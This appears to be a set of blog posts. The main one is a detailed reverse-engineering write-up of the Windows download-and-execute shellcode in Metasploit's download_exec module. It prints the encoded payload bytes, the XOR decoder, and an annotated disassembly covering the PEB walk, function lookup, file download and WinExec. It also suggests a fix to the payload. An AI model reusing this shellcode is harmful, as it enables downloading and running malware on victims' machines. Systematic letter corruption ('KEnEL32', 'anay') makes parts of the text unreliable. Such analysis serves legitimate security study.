The syntax of PDF and along with other reasons that the standard has no explicitly described method for validation of PDF documents allows the creation of PDF documents that are at the same time executables, which contain malicious code or that pose as any of a number of data formats.

In a PDF, one can call system commands, execute arbitrary programs, form documents that display different contents depending on the PDF reader program used, and so on.

Julia Wolf is focused on Acrobat, because it is still today the most common PDF client, but the standard on on which these programs are based is sufficiently confusing and complex that the exploitation of vulnerabilities is possible with each independent implementation.

Appendix D

Stuff that should be here, but isn't:

  • Testing Samples
  • PDF Portmanteau technical explanation
  • PDF Quine, with explanation
  • Misc. stuff, like that forwards-backwards-pages PDF file (It's in the Test Samples)

Once I've organized it all, I'll publish it on this blog. But I'm rushing to get this one [the blog post you're now reading] published.



Musings on download_exec.rb


This is not anything new and exciting¹, and should hopefully be familiar to some of you reading this. Some time ago I reversed the shellcode from Metasploit's download_exec module. It's a bit different from the rest of the stuff in MSF, because there's no source code with it, and it lacks certain features that the other shellcode[s] have (like being able to set the exit function).

When I started writing this blog post, the day before yesterday, I looked into the history of this particular scrap of code…

It's very similar to lion's downloadurl_v31.c available here:

… Except that, that code seems to be a more recent version than the code in MSF. For example, that does the LSD-PL function name hash trick, rather than lug around the full function names for look-up (as the version in MSF does.)

So, lion was a major figure in the Chinese 红客 Honker scene — literally translated as Red Guest (or Red Visitor or Red Passenger). (Basically Hackers who are also Chinese nationalists.) His group was the Honker Union of China [HUC], — this site seems to have been dead for a while. He wrote a lot of code back in 2003 and 2004. (我现在明白了一些在写这个汉字!)

I managed to dig up an older version of this 'downloadurl' code dated 2003-09-01 which is closer to the code in MSF. [archive] The code credits ey4s (from XFocus I think) for the actual shellcode.

Anyway, big chunks of this code, like the whole PEB method, also look like they were directly copied from Skape's old stuff (Dec 2003) — which was copied from Dino Dai Zovi (Apr 2003) — which was copied from Ratter/29A (Mar 2002) etc. etc. Like I said, this is all very old stuff. None of it has really changed since 2002, and it's still in very common use.

pita's contribution to all this appears to be wrapping up the blob of code

output by the lion program above into a MSF2 module:

Meta Commentary

What is the plural of the word shellcode? Neither shellcodes nor shellscode sound right. I believe that the word shellcode is a mass noun, so it's the same singular as plural. (Or at the very least, it only sounds right as a plural when used with a plural verb.) If I have some shellcode, and I add some more shellcode to that, then I still have some shellcode, more shellcode than before.

Bob has one shellcode.

Alice wrote three shellcode.

Malory has a lot of shellcode.









Bob has one shellcode.

Alice wrote three shellcodes.

Malory has a lot of shellcodes.




Here is shellcode. ← Sounds ok to me.

Here is a shellcode. ← No, sounds wrong.

Here is some shellcode. ← Sounds ok to me.

Here is some shellcodes. ← No, sounds wrong.

Here are some shellcode. ← Doesn't sound right either.

Here are some shellcodes. ← Sounds ok to me.

Long Technical Part

Let's take a look at the MSF code

# This file is part of the Metasploit Framework and may be subject to


'License' => BSD_LICENSE,

'Platform' => 'win',

'Arch' => ARCH_X86,

'Privileged' => false,

'Payload' =>


'Offsets' => { },

'Payload' =>



The decoder is self-explanatory, so I don't know why I'm explaining it, anyway… It finds where it is in memory, XORs the encrypted code right after it, and then runs the decrypted code.

0000  EB10         jmp short 0x12           ; Get EIP trick

0002 5A pop edx ; EDX points to the star

; of the encoded shellcod

0003 4A dec edx ; The LOOP exits at ECX=0,

; so XOR [EDX+0],0x99 never

; happens (Last XOR is [EDX+1])

0004 33C9 xor ecx,ecx ; ECX = 0

0006 66B93C01 mov cx,0x13c ; Shellcode length = 0x13C

000A 80340A99 xor byte [edx+ecx],0x99 ; Encoder/Decoder (xor) Key=0x99

000E E2FA loop 0xa ; XOR each byte from the end

; to the begining

0010 EB05 jmp short 0x17 ; Run decoded shellcode

0012 E8EBFFFFFF call 0x2 ; PUSH EIP

0017 ... ; Start of shellcode

Here's the decrypted shellcode, side by side with the original.


"\x70\x4C\x99\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"+ #000 e9 d5 00 00 00 5a 64 a1 30 00 00 00 8b 40 0c 8b |.....Zd.0....@..|

"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"+ #010 70 1c ad 8b 40 08 8b d8 8b 73 3c 8b 74 1e 78 03 |p...@....s<.t.x.|

"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"+ #020 f3 8b 7e 20 03 fb 8b 4e 14 33 ed 56 57 51 8b 3f |..~ ...N.3.VWQ.?|

"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"+ #030 03 fb 8b f2 6a 0e 59 f3 a6 74 08 59 5f 83 c7 04 |....j.Y..t.Y_...|

"xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"+ #040 45 e2 e9 59 5f 5e 8b cd 8b 46 24 03 c3 d1 e1 03 |E..Y_^...F$.....|

"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"+ #050 c1 33 c9 66 8b 08 8b 46 1c 03 c3 c1 e1 02 03 c1 |.3.f...F........|

"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9D\xC0"+ #060 8b 00 03 c3 8b fa 8b f7 83 c6 0e 8b d0 6a 04 59 |.............j.Y|

"\x71\xC9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"+ #070 e8 50 00 00 00 83 c6 0d 52 56 ff 57 fc 5a 8b d8 |.P......RV.W.Z..|

"\xF3\x98\xC0\x71\xA4\x99\x99\x99\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19"+ #080 6a 01 59 e8 3d 00 00 00 83 c6 13 56 46 80 3e 80 |j.Y.=......VF.>.|

"\xEC\x63\x19\xAF\x19\xC7\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCE"+ #090 75 fa 80 36 80 5e 83 ec 20 8b dc 6a 20 53 ff 57 |u..6.^.. ..j S.W|

"\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"+ #0a0 ec c7 04 03 5c 61 2e 65 c7 44 03 04 78 65 00 00 |....a.e.D..xe..|

"\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66\xCE\x65\x12\x45\xC9\xCA\x66\xCE"+ #0b0 33 c0 50 50 53 56 50 ff 57 fc 8b dc 50 53 ff 57 |3.PPSVP.W...PS.W|

"\x69\xC9\x66\xCE\x6D\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA"+ #0c0 f0 50 ff 57 f4 33 c0 ac 85 c0 75 f9 51 52 56 53 |.P.W.3....u.QRVS|

"\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\xBF\x66\x66\x66\xDE"+ #0d0 ff d2 5a 59 ab e2 ee 33 c0 c3 e8 26 ff ff ff 47 |..ZY...3...&...G|

"\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDE\xFC"+ #0e0 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 47 65 |etProcAddress.Ge|

"\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD\xF0\xEB\xFC\xFA\xED\xF6\xEB\xE0"+ #0f0 74 53 79 73 74 65 6d 44 69 72 65 63 74 6f 72 79 |tSystemDirectory|

"\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"+ #100 41 00 57 69 6e 45 78 65 63 00 45 78 69 74 54 68 |A.WinExec.ExitTh|

"\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"+ #110 72 65 61 64 00 4c 6f 61 64 4c 69 62 72 61 72 79 |read.LoadLibrary|

"\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"+ #120 41 00 75 72 6c 6d 6f 6e 00 55 52 4c 44 6f 77 6e |A.urlmon.URLDown|

"\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99" #130 6c 6f 61 64 54 6f 46 69 6c 65 41 00 |loadToFileA.|




# EXITFUNC is not supported :/


# Register command execution options


['URL', [ true, "The pre-encoded URL to the executable" ])

], self.class)



# Constructs the payload


def generate_stage

retun module_info['Payload']['Payload'] + (datastore['URL'] || '') + "\x80"



Finding KEnEL32.DLL

The MSDN documentation on the PEB structure is rather lacking in detail.

This is a bit more useful: PEB on

Ditto for the MSDN info on _PEB_LDR_DATA

This is better:PEB_LDR_DATA on,

and this: PEB_LDR_DATA on

The best information I've found on the structures is from using dt in kd.

I originally drew this in ASCII, and then redrew this using the Unicode box drawing characters. But then I discovered that Firefox gets the font metrics completely wrong, so that box drawing characters, in a monospace font, are all different widths, so nothing lines up. ← This is stupid. So it's 7-bit ASCII for now. (WebKit based browsers get it right, and so does lynx and links.)

The first six instructions of the shellcode (after the EIP stuff) find KEnEL32.DLL's base address by walking down the following chain of structures.

The FS segment register points to the _TEB for each executing thread. (Everyone remembers segment registers from the 16-bit days, right?) This is much simpler than keeping the pointer in memory somewhere, and then remembering where that memory was, etc. (It's also used to find the final exception handler if the program just can't cope.) This is also a clever optimization if you're going to be refening to stuff in the structure a lot. (Although FS:0 is uneachable from most C compilers, so inline assembly must be used.) The segment registers aren't used for much in userspace protected mode, so it doesn't contribute to register pressure. The _TEB usually lives around 0x7FFDF000 depending on a bunch of factors (like which version of Windows is used and how many threads).

This technique assumes that KEnEL32.DLL is the first module loaded (first node in the InInitilizationOrder Module List). If not, it'll crash and bun. Since all of the shellcode you see these days (in drive-by exploits, etc) does this exact same PEB lookup trick. You can break them all just by loading a dummy DLL first, before KEnEL32. Windows 7 does this now, apparently on accident.

For the uninitiated, I'll show you how this works…


+0x000 NtTib : _NT_TIB <- FS:0

+0x01c EnvironmentPointer : Ptr32 Void

+0x020 ClientId : _CLIENT_ID

+0x028 ActiveRpcHandle : Ptr32 Void

+0x02c ThreadLocalStoragePointer : Ptr32 Void

+0x030 ProcessEnvironmentBlock : Ptr32 _PEB -----┐

+0x034 LastEnorValue : Uint4B │

+0x038 CountOfOwnedCriticalSections : Uint4B │

[etc.] │

┌-------------------------------------------┘ MOV EAX, [FS:0x30]


+0x000 InheritedAddressSpace : UChar

+0x001 ReadImageFileExecOptions : UChar

+0x002 BeingDebugged : UChar

+0x003 SpareBool : UChar

+0x004 Mutant : Ptr32 Void

+0x008 ImageBaseAddress : Ptr32 Void

+0x00c Ldr : Ptr32 _PEB_LDR_DATA ---------------┐

+0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS │

+0x014 SubSystemData : Ptr32 Void │

+0x018 ProcessHeap : Ptr32 Void │

+0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION │

+0x020 FastPebLockRoutine : Ptr32 Void │

+0x024 FastPebUnlockRoutine : Ptr32 Void │

+0x028 EnvironmentUpdateCount : Uint4B │

+0x02c KenelCallbackTable : Ptr32 Void │

+0x030 SystemReserved : [1] Uint4B │

+0x034 AtlThunkSListPtr32 : Uint4B │

+0x038 FreeList : Ptr32 _PEB_FREE_BLOCK │

[etc.] │

┌-------------------------------------------------------------┘ MOV EAX, [EAX+0xC]

nt!_PEB_LDR_DATA [AKA: "ProcessModuleInfo" or "PROCESS_MODULE_INFO"]

+0x000 Length : Uint4B

+0x004 Initialized : UChar

+0x008 SsHandle : Ptr32 Void

+0x00c InLoadOrderModuleList : _LIST_ENTRY

+0x014 InMemoryOrderModuleList : _LIST_ENTRY

+0x01c InInitializationOrderModuleList : _LIST_ENTRY -----┐

+0x024 EntryInProgress : Ptr32 Void │

┌------------------------------------------------------┘ MOV ESI, [EAX+0x1C] ; LODSD


│ +0x000 InLoadOrderLinks : _LIST_ENTRY

│ +0x000 Flink : Ptr32

│ +0x004 Blink : Ptr32

│ +0x008 InMemoryOrderLinks : _LIST_ENTRY

│ +0x000 Flink : Ptr32

│ +0x004 Blink : Ptr32

│ +0x010 InInitializationOrderLinks : _LIST_ENTRY

└-------> +0x000 Flink : Ptr32 -┐ This distance

+0x004 Blink : Ptr32 │ is eight bytes

+0x018 DllBase : Ptr32 Void -┘ DllBase → _IMAGE_DOS_HEADER

+0x01c EntryPoint : Ptr32 Void

+0x020 SizeOfImage : Uint4B

+0x024 FullDllName : _UNICODE_STRING

+0x02c BaseDllName : _UNICODE_STRING

+0x034 Flags : Uint4B

+0x038 LoadCount : Uint2B

+0x03a TlsIndex : Uint2B

+0x03c HashLinks : _LIST_ENTRY

+0x03c SectionPointer : Ptr32 Void

+0x040 CheckSum : Uint4B

+0x044 TimeDateStamp : Uint4B

+0x044 LoadedImports : Ptr32 Void

+0x048 EntryPointActivationContext : Ptr32 Void

+0x04c PatchInformation : Ptr32 Void



Importing Functions

So at this point, the shellcode knows where to find the first DLL file that was mapped into memory. Now it finds functions in the library in the same way that Windows does it.


+0x000 InLoadOrderLinks : _LIST_ENTRY

+0x008 InMemoryOrderLinks : _LIST_ENTRY

+0x010 InInitializationOrderLinks : _LIST_ENTRY ← So EAX was pointing here

+0x018 DllBase : Ptr32 Void -------------┐ MOV EAX, [EAX+0x8]

[etc.] │

┌--------------------------------------------------------┘ MOV EBX, EAX

nt!_IMAGE_DOS_HEADER EBX points here, and is used for all Virtual Address offsets

+0x000 e_magic : Uint2B (usually "MZ")

+0x002 e_cblp : Uint2B

+0x004 e_cp : Uint2B

+0x006 e_crlc : Uint2B

+0x008 e_cparhdr : Uint2B

+0x00a e_minalloc : Uint2B

+0x00c e_maxalloc : Uint2B

+0x00e e_ss : Uint2B

+0x010 e_sp : Uint2B

+0x012 e_csum : Uint2B

+0x014 e_ip : Uint2B

+0x016 e_cs : Uint2B

+0x018 e_lfarlc : Uint2B

+0x01a e_ovno : Uint2B

+0x01c e_res : [4] Uint2B

+0x024 e_oemid : Uint2B

+0x026 e_oeminfo : Uint2B

+0x028 e_res2 : [10] Uint2B

+0x03c e_lfanew : Int4B -------┐ MOV ESI, [EBX+0x3C]




+0x000 Signature : Uint4B (usually "PE\0\0") --┐

+0x004 FileHeader : _IMAGE_FILE_HEADER │

+0x000 Machine : Uint2B │

+0x002 NumberOfSections : Uint2B │

+0x004 TimeDateStamp : Uint4B │

+0x008 PointerToSymbolTable : Uint4B │

+0x00c NumberOfSymbols : Uint4B │

+0x010 SizeOfOptionalHeader : Uint2B │

+0x012 Characteristics : Uint2B │ This distance is

+0x018 OptionalHeader : _IMAGE_OPTIONAL_HEADER │ 0x78 bytes long

+0x000 Magic : Uint2B │

+0x002 MajorLinkerVersion : UChar │

+0x003 MinorLinkerVersion : UChar │

+0x004 SizeOfCode : Uint4B │ (That's 0x18+0x60 bytes

+0x008 SizeOfInitializedData : Uint4B │ from the PE header to the

+0x00c SizeOfUninitializedData : Uint4B │ _IMAGE_DATA_DIRECTORY)

+0x010 AddressOfEntryPoint : Uint4B │

+0x014 BaseOfCode : Uint4B │

+0x018 BaseOfData : Uint4B │

+0x01c ImageBase : Uint4B │

+0x020 SectionAlignment : Uint4B │

+0x024 FileAlignment : Uint4B │

+0x028 MajorOperatingSystemVersion : Uint2B │

+0x02a MinorOperatingSystemVersion : Uint2B │

+0x02c MajorImageVersion : Uint2B │

+0x02e MinorImageVersion : Uint2B │

+0x030 MajorSubsystemVersion : Uint2B │

+0x032 MinorSubsystemVersion : Uint2B │

+0x034 Win32VersionValue : Uint4B │

+0x038 SizeOfImage : Uint4B │

+0x03c SizeOfHeaders : Uint4B │

+0x040 CheckSum : Uint4B │

+0x044 Subsystem : Uint2B │

+0x046 DllCharacteristics : Uint2B │

+0x048 SizeOfStackReserve : Uint4B │

+0x04c SizeOfStackCommit : Uint4B │

+0x050 SizeOfHeapReserve : Uint4B │

+0x054 SizeOfHeapCommit : Uint4B │

+0x058 LoaderFlags : Uint4B │

+0x05c NumberOfRvaAndSizes : Uint4B │

+0x060 DataDirectory : [16] _IMAGE_DATA_DIRECTORY -┘ MOV ESI, [ESI+EBX+0x78]; ADD ESI, EBX


/ (This isn't exactly kd output, I've fabricated it.)



+0x060 +0x000 VirtualAddress : Uint4B RVA of the table - Relative to Base Address (EBX)

+0x064 +0x004 Size : Uint4B


+0x068 +0x008 VirtualAddress : Uint4B

[etc.] +0x00c Size : Uint4B


+0x010 VirtualAddress : Uint4B

+0x014 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Exception Table

+0x018 VirtualAddress : Uint4B

+0x01c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Certificate Table

+0x020 VirtualAddress : Uint4B

+0x024 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Base Relocation Table

+0x028 VirtualAddress : Uint4B

+0x02c Size : Uint4B


+0x030 VirtualAddress : Uint4B

+0x034 Size : Uint4B


+0x038 VirtualAddress : Uint4B

+0x03c Size : Uint4B


+0x040 VirtualAddress : Uint4B

+0x044 Size : Uint4B


+0x048 VirtualAddress : Uint4B

+0x04c Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Load Config Table

+0x050 VirtualAddress : Uint4B

+0x054 Size : Uint4B


+0x058 VirtualAddress : Uint4B

+0x05c Size : Uint4B


+0x060 VirtualAddress : Uint4B

+0x064 Size : Uint4B

nt!_IMAGE_DATA_DIRECTORY Delay Import Descriptor

+0x068 VirtualAddress : Uint4B

+0x06c Size : Uint4B


+0x070 VirtualAddress : Uint4B

+0x074 Size : Uint4B


+0x078 VirtualAddress : Uint4B

+0x07c Size : Uint4B


Importing Functions

Now where were we...


+0x000 VirtualAddress : Uint4B -----┐ MOV ESI, [ESI+EBX+0x78] ; ADD ESI, EBX

+0x004 Size : Uint4B │




+0x000 Characteristics : Uint4B

+0x004 TimeDateStamp : Uint4B

+0x008 MajorVersion : Uint2B Number of Names or Functions in EAT

+0x00a MinorVersion : Uint2B Because of aliasing, these can be different values.

+0x00c Name : Uint4B The shellcode uses the wrong one for the name lookup loop.

+0x010 Base : Uint4B

+0x014 NumberOfFunctions : Uint4B ------ MOV ECX, [ESI+0x14]

+0x018 NumberOfNames : Uint4B

+0x01c AddressOfFunctions : Uint4B

+0x020 AddressOfNames : Uint4B -----┐ MOV EDI, [ESI+0x20] ; ADD EDI, EBX

+0x024 AddressOfNameOrdinals : Uint4B │

│ The Export Name Table is just an

│ anay of pointers to C-style strings.

│ The Ordinal table uses the exact

│ same anay indexes.


│ As a concrete example, I'm using RVA values from the WinXP SP2 English KEnEL32.DLL

│ The base address of this DLL is 0x77E80000, so EBX will be pointing there in the code below.

│ Base Address + RVA = Actual Virtual Address in memory (Most of the time)

EDI↓ AddressOfNames=0x577B2 AddressOfNameOrdinals=0x57144 AddressOfFunctions=0x56468

name[ 0]=0x5849B → "AddAtomA\0" ordinal[ 0]=0x0000 function[0x0000]=0x0000932E

name[ 1]=0x584A4 → "AddAtomW\0" ordinal[ 1]=0x0001 function[0x0001]=0x00009BC4

name[ 2]=0x584AD → "AddConsoleAliasA\0" ordinal[ 2]=0x0002 function[0x0002]=0x00044457

name[ 3]=0x584BE → "AddConsoleAliasW\0" ordinal[ 3]=0x0003 function[0x0003]=0x00044420

name[ 4]=0x584CF → "AllocConsole\0" ordinal[ 4]=0x0004 function[0x0004]=0x0004520E

name[ 5]=0x584DC → "AllocateUserPhysicalPages\0" ordinal[ 5]=0x0005 function[0x0005]=0x000339D6

name[ 6]=0x584F6 → "AreFileApisANSI\0" ordinal[ 6]=0x0006 function[0x0006]=0x00018678

name[ 7]=0x58506 → "AssignProcessToJobObject\0" ordinal[ 7]=0x0007 function[0x0007]=0x00043BAE

name[ 8]=0x5851F → "BackupRead\0" ordinal[ 8]=0x0008 function[0x0008]=0x00029776

name[ 9]=0x5852A → "BackupSeek\0" ordinal[ 9]=0x0009 function[0x0009]=0x000299D2

name[ 10]=0x58535 → "BackupWrite\0" ordinal[ 10]=0x000A function[0x000A]=0x0002A2FA

name[ 11]=0x58541 → "BaseAttachCompleteThunk\0" ordinal[ 11]=0x000B function[0x000B]=0x00028916

name[ 12]=0x58559 → "Beep\0" ordinal[ 12]=0x000C function[0x000C]=0x0002A518

[...] [...] [...]

name[339]=0x59DA5 → "GetProcAddress\0" ordinal[339]=0x0153 function[0x0153]=0x0001564B

[...] [...] [...]

name[821]=0x5BEA9 → "lstrlenA\0" ordinal[821]=0x0335 function[0x0335]=0x00017334

name[822]=0x5BEB2 → "lstrlenW\0" ordinal[822]=0x0336 function[0x0336]=0x0000CD5C

║ ⇑ ║ ⇑

╚====================================================╝ ╚========================╝

; So this loop walks down the AddressOfNames anay, doing string comparisons with the strings stored at

; the end of the shellcode. It keeps track of how many iterations the loop has gone through through,

; which will be the ordinal number when the loop exits.

; (The left half of the diagram above.)


; EDI and ECX get clobbered for the REPE CMPSB op

push edi ; 57 ; AddressOfNames Anay Stack: EDI

push ecx ; 51 ; NumberOfFunctions left to go Stack: ECX EDI

mov edi, [edi] ; 8B 3F ; EDI points to start of a Name String

add edi, ebx ; 03 FB ; RVA to VA conversion

mov esi, edx ; 8B F2 ; EDX points to string table at end of shellcode "GetProcAddress" etc.

push byte +0xe ; 6A 0E ; Only compare the first fourteen chars

pop ecx ; 59 ; ECX = 0xE

repe cmpsb ; F3 A6 ; Compare [ESI] with [EDI]

jz Exitloop ; 74 08 ; If we've found the string, we're done

pop ecx ; 59 ; NumberOfFunctions left to check. Stack: EDI

pop edi ; 5F ; Curent Index of AddressOfNames Anay

add edi, byte +0x4 ; 83 C7 04 ; Next AddressOfNames pointer

inc ebp ; 45 ; Ordinal / AddressOfNames Anay index

loop NameToOrdinal ; E2 E9 ;


; snip...

; This code finds the function's address using the ordinal

; (The center half of the diagram above.)

mov ecx, ebp ; 8B CD ; EBP = Ordinal (AddressOfNames Anay index)

mov eax, [esi+0x24] ; 8B 46 24 ; AddressOfNameOrdinals RVA

add eax, ebx ; 03 C3 ; RVA to VA conversion

shl ecx, 1 ; D1 E1 ; Ordinal * 2

add eax, ecx ; 03 C1 ; EAX = (*AddressOfNameOrdinals) + (Ordinal * 2)

; to put in another way EAX = &AddressOfNameOrdinals[Ordinal]

xor ecx, ecx ; 33 C9 ; ECX = 0

mov cx, [eax] ; 66 8B 08 ; CX = Ultimate Index (FunctionOrdinal) into AddressOfFunctions

; (The right half of the diagram above.) (Yes I know that's three halves.)

mov eax, [esi+0x1c] ; 8B 46 1C ; AddressOfFunctions RVA

add eax, ebx ; 03 C3 ; RVA to VA conversion

shl ecx, 0x2 ; C1 E1 02 ; FunctionOrdinal * 4

add eax, ecx ; 03 C1 ; EAX = (*AddressOfFunctions) + (FunctionOrdinal * 4)

; alt. EAX = &AddressOfFunctions[AddressOfNameOrdinals[Ordinal]]

mov eax, [eax] ; 8B 00 ; EAX = RVA of function (ta-da)

add eax, ebx ; 03 C3 ; RVA to VA conversion

The rest of the functions from KEnEL32.DLL which the shellcode uses are looked up with GetProcAddress() in a loop. Each function address is stored on top of the strings at the end of the shellcode. (i.e. It overwrites "GetProcAddress\0GetSystemDirectoryA\0" …etc.)

mov edi, edx ; 8B FA ; EDX points to string table

mov esi, edi ; 8B F7 ; And so now EDI and ESI point there too

add esi, byte +0xe ; 83 C6 0E ; "GetProcAddress" is 0xE bytes long, skip it.

mov edx, eax ; 8B D0 ; The address of GetProcAddress()

push byte +0x4 ; 6A 04 ; Number of names (after "GetProcAddress") to lookup in KEnEL32

pop ecx ; 59 ; ECX = 4 names to lookup

call GetFunctions ; E8 50000000 ; ------



; FARPROC WINAPI GetProcAddress(

; __in HMODULE hModule,

; __in LPCSTR lpProcName

; );


xor eax,eax ; 33C0 ; EAX = 0

lodsb ; AC ; EAX = byte [ESI] assumes DF=0 I guess

test eax,eax ; 85C0 ; Check if at end of function name string

jnz Getfunctions ; 75F9 ; The loop advances ESI to the end of

; this sting and start of next

push ecx ; 51 ; Loop counter: 4,3,2,1

push edx ; 52 ; GetProcAddress function address

push esi ; 56 ; lpProcName = ESI = Start of name string in list

push ebx ; 53 ; hModule = KEnEL32 base address or URLMON base address

; GetProcAddress(hModule [in], lpProcName [in])

call edx ; FFD2 ; EAX = GetProcAddress(EBX, ESI)

pop edx ; 5A ; GetProcAddress function address

pop ecx ; 59 ; Loop counter: 4,3,2,1

stosd ; AB ; Store Function Pointer, EAX, at [EDI]

loop Getfunctions ; E2EE ; Lather, rinse, repeat

xor eax,eax ; 33C0 ; Retun zero upon success?

ret ; C3 ; _______________________________________

db "GetProcAddress",0 ; EDI starts at this address.

db "GetSystemDirectoryA",0 ; After loading URLMON becomes [edi-0x14]

db "WinExec",0 ; After loading URLMON becomes becomes [edi-0x10]

db "ExitThread",0 ; After loading URLMON becomes becomes [edi-0x0C]

db "LoadLibraryA",0 ; [edi-0x04] After loading URLMON becomes becomes [edi-0x08]



add esi, byte +0xd ; 83C60D ; ESI was at start of "LoadLibraryA\0" which is 0xD long

push edx ; 52 ; GetProcAddress function address

push esi ; 56 ; lpFileName = ESI point to "urlmon\0"

call near [edi-0x4] ; FF57FC ; EAX = LoadLibrary(ESI)


; lpFileName


; __in LPCTSTR lpFileName

; );

pop edx ; 5A ; GetProcAddress function address

mov ebx, eax ; 8B D8 ; Handle to URLMON module

push byte +0x1 ; 6A 01 ; Number of names to lookup in URLMON.DLL

pop ecx ; 59 ; ECX = 1 name to lookup

call Getfunctions ; E8 3D000000 ; ------

add esi, byte +0x13 ; 83 C6 13 ; ESI was at "URLDownloadToFileA\0" so move past it

push esi ; 56 ; szURL = ESI points to URL


db "urlmon",0 ;

db "URLDownloadToFileA",0 ; becomes [edi-0x04]

Calling Functions (finally at last)

The URL is terminated with a 0x80 byte rather than a 0x00. As this URL string is never encoded; It's probably an attempt to avoid null bytes, even to the very end!


inc esi ; 46 ; Next letter of URL

cmp byte [esi],0x80 ; 803E80 ; Is it the end?

jnz strlen_80 ; 75FA ;

xor byte [esi],0x80 ; 803680 ; At end of URL, change 0x80 into a 0x00

pop esi ; 5E ; szURL = ESI points to URL

This just gets the path to the System32 directory.


; UINT WINAPI GetSystemDirectory(

; __out LPTSTR lpBuffer

; __in UINT uSize

; );

sub esp, byte +0x20 ; 83EC20 ; Make some space for the string on the stack

mov ebx, esp ; 8BDC ; EBX = lpBuffer

push byte +0x20 ; 6A20 ; uSize = 0x20 bytes

push ebx ; 53 ; lpBuffer (0x20 bytes on stack)

call near [edi-0x14] ; FF57EC ; EAX = string length = GetSystemDirectoryA(EBX, 0x20)

The string "\\a.exe" is appended onto the end of whatever GetSystemDirectory() retuned, and the downloaded file from the URL is written to that.


; HRESULT URLDownloadToFile( LPUNKNOWN pCaller


; LPCTSTR szFileName,

; DWORD dwReserved,


; );

mov dword [ebx+eax], 0x652e615c ; C704035C612E65 ; lpBuffer + length = "\\a.e"

mov dword [ebx+eax+0x4], 0x6578 ; C744030478650000 ; lpBuffer + length + 4 = "ex"

xor eax, eax ; 33C0 ; EAX = 0 if that wasn't obvious

push eax ; 50 ; lpfnCB = 0

push eax ; 50 ; dwReserved = 0

push ebx ; 53 ; szFileName = %systemdir%\a.exe

push esi ; 56 ; szURL = URL at end of shellcode

push eax ; 50 ; pCaller = 0

call near [edi-0x4] ; FF57FC ; URLDownloadToFileA(0, ESI, EBX, 0, 0);

Y'all know what's coming next... WinExec!



; __in LPCSTR lpCmdLine,

; __in UINT uCmdShow

; );

mov ebx,esp ; 8B DC ; EBX points to %systemdir%\a.exe

push eax ; 50 ; uCmdShow = either S_OK or E_OUTOFMEMORY or INET_E_DOWNLOAD_FAILURE

; I think what is intended is uCmdShow = 0

push ebx ; 53 ; lpCmdLine = %systemdir%\a.exe

call near [edi-0x10] ; FF57F0 ; WinExec("%systemdir%\\a.exe",0);


And that's it, we're basically done, so exit. Note, if someone wanted to fix the EXITFUNC feature for this in MSF, you can either store ExitThread or ExitProcess

in the string table (the arguments are the same, but their lengths are off by one.) or modify the shellcode logic itself. I'm very tempted to make the changes myself, but I've got a bunch of other stuff I need to get done this week.

(The easiest, but least elegant fix is to just swap out all the encoded strings starting at 0x10A and going all the way to the end.)


; VOID WINAPI ExitThread(

; __in DWORD dwExitCode

; );

push eax ; 50 ; EnOR_BAD_FORMAT or EnOR_FILE_NOT_FOUND or one

; of the other things WinExec() might retun.

; It's 32 or over on success

call near [edi-0xc] ; FF57F4 ; ExitThread(EAX)

Let me know if I've made any enors in this write up. I was too lazy to check most of this out in a debugger; It's all come directly out of my head.

I've put an easy-to-assemble version of all this here:


Note that NASM uses the altenative instruction encodings for some x86 opcodes, so you won't get the exact same binary out of NASM as the original in MSF. If you don't know what this means, then don't wony, I'll explain it later.

Exercises for the reader

  1. Why does the shellcode use GetProcAddress() to look up the rest of the function names instead of the code which looked up "GetProcAddress" from the KEnEL32.DLL export table in the first place?

  3. What other shellcode has the same NumberOfFunctions verses NumberOfNames usage bug as this?

  5. What other shellcode uses %systemdir%\a.exe verses something else.

  7. What happens if URLDownloadToFileA() fails?




Win32 API Shellcode Hash Algorithm

1. A Modest Proposal

Daylight Saving Time

Allegedly, the purpose of Daylight Saving Time is to save energy by manipulating a unit of measurement.

Mileage Saving Time

I have a similar proposal for how to save on gasoline usage. If we redefine the mile to be 4,800 feet during Summer — when people drive the most. Then everyone will drive 10% more miles per gallon of gas. So for example, during the winter, if your car gets 30MPG, then during Mileage Saving Time, you'd be getting 33MPG!

(Actually, it's more like redefining the distance between San Francisco, and Sacramento from 90 miles to 80 miles. That way the two cities are closer together, reducing the amount of time and energy spent traveling between them.)

2. Something Technical

Simple Hash Function(s)

